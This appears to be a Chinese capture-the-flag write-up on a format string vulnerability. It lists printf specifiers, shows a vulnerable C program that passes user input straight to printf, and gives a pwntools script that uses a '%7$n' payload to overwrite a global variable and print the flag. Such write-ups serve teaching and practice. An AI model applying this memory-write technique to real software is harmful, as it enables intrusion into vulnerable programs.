格式化字符串漏洞
具体什么是格式化字符串请大家参考如下文章
https://wiki.x10sec.org/pwn/fmtstr/fmtstr_intro/
printf函数格式化输出符号及详细说明
原文地址:https://blog.csdn.net/xiexievv/article/details/6831194
%a 浮点数、十六进制数字和p-记数法(c99
%A 浮点数、十六进制数字和p-记法(c99)
%c 一个字符(char)
%C 一个ISO宽字符
%d 有符号十进制整数(int)(%ld、%Ld:长整型数据(long),%hd:输出短整形。)
%e 浮点数、e-记数法
%E 浮点数、E-记数法
%f 单精度浮点数(默认float)、十进制记数法(%.nf 这里n表示精确到小数位后n位.十进制计数)
%g 根据数值不同自动选择%f或%e.
%G 根据数值不同自动选择%f或%e.
%i 有符号十进制数(与%d相同)
%n:将%n之前printf已经打印的字符个数赋值给偏移处指针所指向的地址位置
%o 无符号八进制整数
%p 指针
%s 对应字符串char*(%s = %hs = %hS 输出 窄字符)
%S 对应宽字符串WCAHR*(%ws = %S 输出宽字符串)
%u 无符号十进制整数(unsigned int)
%x 使用十六进制数字0xf的无符号十六进制整数
%X 使用十六进制数字0xf的无符号十六进制整数
%% 打印一个百分号
%I64d 用于INT64 或者 long long
%I64u 用于UINT64 或者 unsigned long long
%I64x 用于64位16进制数据
%m.n : m指域宽,即对应的输出项在输出设备上所占的字符数。n指精度。用于说明输出的实型数的小数位数。为指定n时,隐含的精度为n=6位。
l 对整型指long型,对实型指double型。h用于将整型的格式字符修正为short型。
题目源码
#include <stdio.h>
int num = 0;
int main() {
setvbuf(stdin, 0, 1, 0);
setvbuf(stdout, 0, 2, 0);
char str[100];
printf("try pwn me?
");
scanf("%s", str);
printf(str);
if (num == 16)
{
system("cat flag");
}
else
{
printf("You may need to keep learning!");
}
return 0;
}
解题
分析
定义了一个全局变量num
str存在溢出
只有一个格式化字符串漏洞
利用漏洞更改num的数值
最终达到输出flag的目的
测试偏移量
可以得到偏移量为7
编写脚本
from pwn import *
p = remote('124.156.121.112',28053)
#p = process("./pwn10")
num_addr = 0x0804A030
payload = p32(num_addr)+"aaaaaaaaaaaa%7$n"
p.sendline(payload)
p.interactive()
测试
